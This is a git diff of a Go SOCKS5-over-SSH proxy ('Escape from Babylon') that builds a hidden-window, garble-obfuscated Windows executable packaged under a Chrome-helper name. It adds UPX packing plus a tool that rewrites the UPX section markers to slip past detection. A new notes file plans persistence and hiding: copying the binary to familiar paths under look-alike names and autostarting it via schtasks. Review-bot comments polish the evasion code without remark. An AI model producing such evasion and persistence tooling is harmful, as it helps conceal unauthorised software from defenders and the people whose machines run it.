diff --git a/Makefile b/Makefile
index fb06f58..f30a6d9 100644
--- a/Makefile
+++ b/Makefile
@@ -21,6 +21,7 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
win: socks5-ssh-proxy.exe
socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
+ upx $@
goreleaser: resources $(GARBLE_BIN)
goreleaser build --clean --snapshot --id win-release
win-package: ChromeProxyHelperPlugin.zip
diff --git a/README.md b/README.md
index e3e3192..01a6d85 100644
--- a/README.md
+++ b/README.md
@@ -61,7 +61,7 @@ Following detections have been tested:
* go
* upx
* goreleaser
-* mingw-w64 (for building the windows dll)
+* mingw-w64 (for building the windows dll/exe)
## Related information
@@ -77,8 +77,4 @@ Following detections have been tested:
*
*
-*
* >
-*
-*
-*
diff --git a/cmd/upx-obfuscator/main.go b/cmd/upx-obfuscator/main.go
index ba6643c..fca8e21 100644
--- a/cmd/upx-obfuscator/main.go
+++ b/cmd/upx-obfuscator/main.go
@@ -6,8 +6,18 @@ import (
"log"
)
-var originalIdentifier = []byte("UPX0")
-var obfuscatedIdentifier = []byte("GSP7")
+func bytesReplace(data, old, new []byte) []byte {
+ foundIndex := bytes.Index(data, old)
+ if foundIndex > -1 {
+ // Found it!
+ log.Println("Found identifier at offset", foundIndex)
+ } else {
+ return data
+ log.Fatalln("Error file is not UPX packed")
+ }
+
+ return bytes.Replace(data, old, new, 1)
+}
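Review bot: The `log.Fatalln("Error file is not UPX packed")` in the else branch of bytesReplace can never run because `return data` precedes it, so a file containing none of the markers is now silently rewritten and reported as done where the old code aborted; keep one behaviour and drop the other line, e.g. `log.Printf("identifier %q not found, skipping", old)` followed by `return data`. The parameter named `new` shadows the builtin, and the found-path message no longer says which marker it matched now that the function is called three times; `log.Printf("found identifier %q at offset %d", old, foundIndex)` with the parameter renamed to `repl` addresses both. bytes.Replace with count 1 rewrites only the first occurrence of each marker, which is worth a one-line comment if deliberate.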
func main() {
if len(os.Args) != 2 {
@@ -21,17 +31,11 @@ func main() {
data, _ := os.ReadFile(filename)
- foundIndex := bytes.Index(data, originalIdentifier)
- if foundIndex > -1 {
- // Found it!
- log.Println("Found UPX identifier at offset", foundIndex)
- } else {
- log.Fatalln("Error file is not UPX packed")
- }
+ data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
+ data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
+ data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
-
- obfuscatedData := bytes.Replace(data, originalIdentifier, obfuscatedIdentifier, 1)
- _ = os.WriteFile(filename, obfuscatedData, 0666)
+ _ = os.WriteFile(filename, data, 0666)
log.Println("done")
}
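Review bot: The error from `os.WriteFile` on the new line is discarded, so a read-only or otherwise unwritable target still logs "done"; `if err := os.WriteFile(filename, data, 0666); err != nil { log.Fatalln(err) }` makes the failure visible. The context line `data, _ := os.ReadFile(filename)` above it has the same problem and on a read error would hand a nil slice through bytesReplace and attempt to write it back, which presumably truncates the input file; checking that error first avoids it. The start of main is outside the hunk.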
diff --git a/docs/NOTES.md b/docs/NOTES.md
new file mode 100644
index 0000000..84a7f6a
--- /dev/null
+++ b/docs/NOTES.md
@@ -0,0 +1,34 @@
+# Some notes to Escape from Babylon
+
+## Well known paths (Windows)
+
+* Python official install path for current user `%APPDATA\Local\Programs\Python\PythonXX`
+* NPM global current user path: `%APPDATA%\Roaming\npm\node_modules\npm\bin`
+* Go bin folder: `C:\Users\YourUsername\go\bin\go.exe`
+* Rust: `C:\Users\YourUsername\.cargo\bin\rustc.exe`
+* Haskel: `C:\Users\YourUsername\AppData\Roaming\local\bin\ghc.exe`
+* FireFox: `C:\Users\\AppData\Local\Mozilla Firefox\firefox.exe`
+* Chrome: `C:\Users\\AppData\Local\Google\Chrome\Application\chrome.exe`
+
+## Ultimate Packer for Executables (UPX)
+
+*
+*
+*
+*
+
+## Persistence and hiding
+
+* Search for existing well known binary paths
+* Copy argv[0] to well known binary path
+* Register startup by system
+ * schtasks (cmd) for system or local user
+ * go-autostart: shortcut in start-menu
+* Write state file of persistence to somewhere...
+
+## Windows
+
+* Copy to well known current user binary path to semi related filenames
+* Run via start menu item for current user, or via `schtasks`
+ *
+ *